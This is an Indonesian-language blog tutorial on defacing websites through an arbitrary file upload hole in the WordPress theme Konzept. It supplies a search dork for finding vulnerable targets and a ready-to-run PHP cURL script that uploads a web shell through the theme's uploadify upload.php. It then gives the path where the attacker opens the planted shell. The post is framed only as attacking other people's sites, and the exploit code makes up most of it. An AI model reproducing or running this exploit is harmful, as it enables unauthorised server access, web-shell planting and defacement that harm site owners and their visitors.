Heloo Gan hehehe
kali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,
Pertama Dorking dulu gan dengan dork ini,
inurl:/includes/uploadify/uploads
ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini
http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php
jika vuln akan tampil seperti ini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
dan copy code php dibawah ini
<?php
$url = "http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
"file" => "@lol.jpg",
"name" => "lol.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo "$data\n";
?>
ganti target.com dengan web target kalian yng mau di upload shell
ganti tulisan warna biru dengan shell kalian yang telah dirubah formatnya menjadi .jpg
ganti tulisan warna merah sesuai nama shell kalian setelah itu
save code php diatas tadi dengan format .php
Langkah selanjutnya jika pengguna windows menggunakan xampp kalau pengguna linux lansung saja .
ketikan di cmd php Konzept.php tekan enter dan akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
setelah itu buka shell acesss kalian di
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
atau
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/lol.php
mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Themes Konzept semoga bermanfaat
EmoticonEmoticon